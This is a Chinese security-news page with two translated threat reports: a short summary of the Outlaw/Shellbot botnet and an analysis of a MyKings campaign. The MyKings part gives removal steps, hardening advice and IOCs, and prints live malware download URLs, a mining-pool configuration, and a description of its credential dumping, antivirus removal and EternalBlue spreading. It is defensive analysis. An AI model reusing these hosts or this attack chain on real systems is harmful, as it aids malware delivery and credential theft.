消息来源:PaloAltoNetworks, 译者:吴烦恼。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接
针对欧洲组织的新的僵尸网络 Outlaw 再度来袭
在我们的日常监控中,我们拦截了一个试图渗透客户网络的Linux恶意软件,该恶意软件是著的“ Shellbot ”,被定义为“ Outlaw Hacking Group”的犯罪工具。 早在2018年,TrendMicro首次发现“Outlaw Hacking Group”,该犯罪团伙主攻汽车和金融业,而Outlaw僵尸网通过暴力登录以及SSH漏洞(利用Shellshock Flaw和Drupalgeddon2漏洞)来实现对目标系统(包括服务器和IoT设备)的远程访问。其中,TrendMicro首次发现的版本还包含一个DDoS脚本,botmaster可以使用该脚的原有设置在暗网上提供的DDoS for-hire服务。 该恶意软件植入程序的主要组件是“Shellbot”变体,它是一个Monero矿机,与一个基于perl的后门捆绑在一起,包括一个基于IRC的bot和一个SSH扫描器。Shellbot自2005年被熟知,近期其出现在网络安全领域,使用的是全新的IRC服务器和全新的Monero pools,攻击目标针对全球组织。 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1204/ 消息来源:YOROI, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接
Mykings 僵尸网络更新基础设施,大量使用 PowerShell 脚本进行“无文件”攻击挖矿
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Eyqm-lgQovFaJnk3FHihJQ 一、概述 MyKings僵尸网络2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络本轮活动主要更新点 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件”落地攻击; 3.在清理竞争对手挖矿木马名单中增加了“新冠”挖矿木马; 4.使用挖矿账号登陆,隐藏了钱包地址; 5.新增白利用文件; 6.不同系统版本执行脚本不同; 7.获取windows登陆密码 攻击流程图 二、解决方案 运维人员可参考以下方法手动清除Windows系统感染的挖矿木马,企业用户亦可使用腾讯T-Sec终端安全管理系统(腾讯御点)查杀病毒,参考安全建议提升服务器的安全性。 删除以下病毒文件: C:\Windows\debug\lsmose.exe C:\Windows\debug\lsmos.exe C:\Windows\debug\lsmo.exe C:\Program Files (x86)\Common Files\csrw.exe C:\Progra~1\Common Files\csrw.exe c:\windows\help\lsmosee.exe c:\windows\help\akpls.exe c:\windows\inf\lsmma.exe c:\windows\inf\lsmm.exe c:\windows\inf\lsmmaa.exe c:\windows\system32\new.exe c:\windows\system32\upsupx.exe c:\windows\inf\aspnet\lsma.exe c:\windows\inf\aspnet\lsmab.exe c:\windows\inf\aspnet\lsmaaa.exe c:\windows\inf\aspnet\lsma30.exe c:\windows\inf\aspnet\lsma31.exe c:\\windows\java\java.exe c:\windows\inf\aspnet\lsma12.exe c:\windows\debug\ok.dat c:\windows\debug\item.dat c:\windows\update.exe c:\windows\temp\servtestdos.dll C:\WINDOWS\Fonts\cd c:\windows\help\get.exe c:\windows\inf\aspnet\u.exe c:\windows\inf\winnts.exe c:\windows\temp\svchost.exe c:\windows\temp\conhost1.exe 删除病毒添加的计划任务 Mysa Mysa1 Mysa2 Mysa3 ok oka 删除病毒添加的WMI事件启动项 fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4 安全建议 1.Mysql端口非必要情况不要暴露在公网,使用足够强壮的Mysql口令; 2.修复MS010-17“永恒之蓝”漏洞,服务器暂时关闭不必要的端口(如135、139、445)。 三、详细分析 mykings本次活动通过mssql爆破手段攻击windows服务器,根据系统版本下发不同的脚本。 WIN10以下主要是对windows defender有关闭操作,并且会使用mimikatz导出windows密码。各系统对应的脚本下载链接: Windows 10,http://173.208.139.170:8170/win10.txt Windows 服务器,http://173.208.139.170:8170/sa.xsl Windows xp,http://173.208.139.170:8170/s.xsl Win Vista~Win8,http://173.208.139.170:8170/abc.txt 脚本入口处搜集IP,进程,内存,处理器信息,上传到FTP 接着下载batpower.txt Batpower首先下载kill.txt,主要作用是清理自身旧版本挖矿程序,以固定阵地,删除相应文件: 清理wmi启动项 下载uninstall.txt,卸载多款主流杀毒软件: 之后去ftp服务器下载三个挖矿木马文件,并设置成计划任务: 下载并设置v.sct开机启动,目前无法连接,具体功能暂时无法得知 继续下载执行wmi.txt,主要设置开机下载执行power.txt,s.txt Power.txt及s.txt有多个地址可供下载 Power.txt功能与batpower.txt功能一样。 s.txt会去下载hxxp://173.208.153.130:8130/wpd.rar,这是一个自解压文件,主要功能是清除竞争对手挖矿木马,如:NSABuffMiner、kingminer,还有最新的“新冠”挖矿木马 “coronav2“。 后下载执行hxxp://167.88.180.175:8175/download.txt,里面也会执行挖矿木马。 链接中的g.exe是pplive的loader模块,用做白利用,以下载并执行其他病毒模块。 该模块会根据命令行下载执行文件,不会做任何验证。 u.exe首先获取mirai僵尸网络下载IP 再获取更新地址: 扫描工具msinfo,并对公网和内网进行扫描攻击,包括使用永恒之蓝漏洞、SQL爆破、Telnet爆破、RDP爆破等多种手段: Mirai携带的永恒之蓝攻击模块 max.exe则是暗云Ⅲ木马,攻击流程无变化。 暗云Ⅲ的更新域名及下载链接 1201.exe是基于xmrig 2.0.4版本修改而来,矿机配置存放在资源段TXT中 “url”: “69.197.156.194:80”, “user”: “abc443”, “pass”: “x”, “url”: “win443.xmrpool.ru:443”, “user”: “abcd1443”, “pass”: “x”, 附录 IOCs MD5 74a09ef83de2599529c9a6f0278fdb60 9f86afae88b2d807a71f442891dfe3d4 929c393fcfb72f9af56ce34df88f82bb 539d218039ad0a2c6bf541af95a013bc a8c98125b9d04673f079bcc717e58a71 5364fae1de8db8fa3faf07bfaf2b706f b150d411a1e29e43b6423f19db4fd3ed 94d5e03b2d21f8f0c6d963570ecba6c1 5d461acc19ac7d2a993ddf0d8866cb1a 93515e391ac22a065279cadd8551d2bc bc7fc83ce9762eb97dc28ed1b79a0a10 d9c32681d65c18d9955f5db42154a0f3 f89cbaf4dbe490787adf5eeb9304d785 44ac832c2b71b4874e544e2b04a72834 6d0bb14c2f5a384bd5073a45db12dabe fa74df0a9a42d29018146520ae0b5585 9459494db3750da9fab3d9deaf4d1106 598ba6f7a900a78666bcb9774620f643 2293f46b3c293e5c637343447e582fdb 8e8f427d93e809137283abfad825b33d b6c1dacca555c61a26907296a04d10de a1783a56738b17ba117b5518399748b0 64ce5ad470cfa503882a3dfac382c6b4 a26ba601674371229eab93a585a79e6b 5c56774156b5fefe2e465b4546006f9a 61e1f73f2e8f566f959e3ffca120aa8b a8557ea0f4034ecf855087e3200354ac 2da63739662c5ea7231c930b61f73a72 5e87427c66ecb84a85700b1180d115f2 f18e88259b1043a6e06c9a16d4c0475e 1a7dcb9970287539774c7ade1cb7e483 e827621c5185488122da57ac16d1fca0 795dd160e8073d23f5c6954602bf3b89 a5b75dfb3b3358ad1a2ef8025ddebb29 cfa550296b848293f912fd625c114015 IP 208.110.71.194 80.85.152.247 66.117.2.182 70.39.124.70 150.107.76.227 103.213.246.23 103.106.250.161 103.106.250.162 144.208.127.215 167.88.180.175 172.83.155.170 173.208.133.114 173.208.153.130 173.247.239.186 192.236.160.237 199.168.100.74 23.236.69.114 74.222.14.97 66.117.6.174 DOMAIN www.upme0611.info mbr.kill0604.ru js.ftp1202.site wmi.1103bye.xyz ok.xmr6b.ru URL hxxp://167.88.180.175:8175/kill.txt hxxp://js.ftp1202.site:280/v.sct hxxp://167.88.180.175:8175/wmi.txt hxxp://173.208.153.130:8130/wpd.rar hxxp://167.88.180.175:8175/download.txt hxxp://js.ftp1202.site:280/v.sct hxxp://wmi.1103bye.xyz:8080/power.txt hxxp://172.83.155.170:8170/power.txt hxxp://192.236.160.237:8237/power.txt hxxp://144.208.127.215:8215/power.txt hxxp://103.106.250.161:8161/power.txt hxxp://103.106.250.162:8162/power.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://173.247.239.186:8186/g.exe hxxp://173.247.239.186:8186/u.exe hxxp://199.168.100.74:8074/max.exe hxxp://199.168.100.74:8074/1201.rar hxxp://23.236.69.114:8114/dll/64npf.sys hxxp://23.236.69.114:8114/update.txt hxxp://23.236.69.114/ups.html hxxp://23.236.69.114:8114/dll/wpcap.dll hxxp://23.236.69.114:8114/dll/packet.dll hxxp://23.236.69.114:8114/dll/npptools.dll hxxp://173.208.133.114:8114/upsupx.exe hxxp://www.upme0611.info/address.txt hxxp://mbr.kill0604.ru/cloud.txt hxxp://74.222.14.97/xpxmr.dat hxxp://ok.xmr6b.ru/xpxmr.dat hxxp://ok.xmr6b.ru/ok/wpd.html hxxp://66.117.6.174/wpdmd5.txt hxxp://66.117.6.174/wpdtest.dat hxxp://66.117.6.174/ver.txt hxxp://66.117.6.174/shellver.txt hxxp://66.117.6.174/csrs.exe hxxp://23.236.69.114:8114/ups.html hxxp://66.117.6.174:8114/update.txt hxxp://66.117.6.174/wpd.jpg hxxp://66.117.6.174/my1.html hxxp://172.83.155.170:280/v.sct hxxp://139.5.177.19:8019/blue.txt 参考链接 https://s.tencent.com/research/report/622.html https://mp.weixin.qq.com/s/KdeF1eaM-Dq1z_wOIb9_oA https://www.freebuf.com/column/187489.html